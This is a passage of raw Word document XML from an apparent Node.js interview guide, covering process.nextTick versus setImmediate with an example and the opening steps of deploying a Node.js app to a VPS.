          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Loop Phase</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E201C93" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process.nextTick(): Runs callbacks before the event loop continues, effectively in the same phase as the currently executing code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F519D5" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setImmediate(): Runs callbacks in the check phase of the event loop, after I/O operations are completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ECBF78" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Potential for Starvation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067A3630" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Because process.nextTick() executes before I/O operations, heavy use of it can lead to I/O starvation, where I/O operations don't get a chance to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197D8FE1" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setImmediate(), on the other hand, allows the event loop to continue and process I/O, reducing the risk of starvation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0105664F" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Practical Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4732A7AF"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Consider the following code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D57CD3F"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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C69EC0A"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Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769102BD"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console.log('start');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3422F4F6" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C1C5536"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setImmediate(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FDDC46"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 xml:space="preserve">  console.log('setImmediate callback');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F8333D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD25B6A" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0309CA74"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process.nextTick(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A8688F"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 xml:space="preserve">  console.log('nextTick callback');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBFF411"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0310E9" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FAC813A"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console.log('end');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E66BF6"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC86056"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sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B247DE8"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Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FF361A"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start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CB50FE"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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EF2066"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nextTick callback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BADA46" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setImmediate callback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B547497" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3209916F" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>start and end are logged first as they are part of the synchronous execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341D1B3A" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nextTick callback is logged next because process.nextTick() schedules the callback to run after the current operation, but before any other I/O events or setImmediate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAA59FC" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setImmediate callback is logged last because it is scheduled to run after the I/O events in the check phase of the event loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E57D35" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185426B1"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39" w:name="_Toc178383222"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q38. How do you deploy a Node.js application to a production server?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="4A132260" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Prepare Your Node.js Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1AA34D" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Environment Configuration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure your application uses environment variables for sensitive data (like database credentials). Use a .env file with the dotenv package for local development and configure these variables on the production server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F7A66D" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Optimize Dependencies:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run npm install --production or npm ci to install only the necessary dependencies, excluding development dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B87B30" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Build Your Application:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> If your application requires a build step (e.g., transpiling TypeScript, bundling front-end assets), run the build process before deploying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5AC73D" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Lint and Test:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure your code is linted and all tests pass to avoid deploying broken code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679A5117" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Choose a Hosting Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2625C8B5" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>VPS Providers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> DigitalOcean, Linode, AWS EC2, Google Cloud, Azure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12918A12" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Platform-as-a-Service (PaaS):</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Heroku, Vercel, Render.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746A7E7F" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Containerization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Docker for packaging your application and deploy to services like AWS ECS, Kubernetes, or DigitalOcean App Platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3483C38D" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Set Up the Production Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF1C3FA" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example using a VPS (e.g., Ubuntu on DigitalOcean):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF819CB" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 1: SSH into the Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A29F442"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ssh username@your_server_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C754B" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 2: Update the System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481AE167"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sudo apt update &amp;&amp; sudo apt upgrade -y</w:t>
      </w:r>
    </w:p>
